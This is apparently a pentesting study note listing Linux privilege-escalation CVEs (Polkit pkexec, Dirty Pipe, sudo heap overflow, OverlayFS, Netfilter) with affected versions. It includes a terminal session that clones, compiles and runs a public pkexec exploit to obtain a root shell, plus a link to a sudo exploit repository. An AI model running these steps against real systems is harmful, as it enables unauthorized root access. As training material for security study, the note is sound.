Critical Vulnerabilities
Polkit (CVE-2021-4034)
#pkexec has assigned setuid means is vulnerable
cry0l1t3@nix02:~$ ls -la /usr/bin/pkexec
-rwsr-xr-x 1 root root 31032 Aug 16 2019 /usr/bin/pkexec
cry0l1t3@nix02:~$ git clone https://github.com/arthepsy/CVE-2021-4034.git
cry0l1t3@nix02:~$ cd CVE-2021-4034
cry0l1t3@nix02:~$ gcc cve-2021-4034-poc.c -o poc -static
cry0l1t3@nix02:~$ ./poc
# id
uid=0(root) gid=0(root) groups=0(root)Dirty Pipe (CVE-2022-0847)
All kernels from version 5.8 to 5.17 are affected and vulnerable to this vulnerability.
Sudo privilege escalation
CVE-2021-3156
One of the latest vulnerabilities for sudo carries the CVE-2021-3156 and is based on a heap-based buffer overflow vulnerability. This affected the sudo versions:
1.8.31 - Ubuntu 20.04
1.8.27 - Debian 10
1.9.2 - Fedora 33
and others
https://github.com/blasty/CVE-2021-3156
Sudo versions prior to 1.8.28 are affected.
Ubuntu OverlayFS Local Privesc CVE-2021-3493
Affected Version
Ubuntu 20.10
Ubuntu 20.04 LTS
Ubuntu 19.04
Ubuntu 18.04 LTS
Ubuntu 16.04 LTS
Ubuntu 14.04 ESM
Netfilter
CVE-2021-22555
Vulnerable kernel versions: 2.6 - 5.11
CVE-2022-25636
A recent vulnerability is CVE-2022-25636 and affects Linux kernel 5.4 through 5.6.10.
CVE-2023-32233
This vulnerability exploits the so called anonymous sets in nf_tables by using the Use-After-Free vulnerability in the Linux Kernel up to version 6.3.1.
Last updated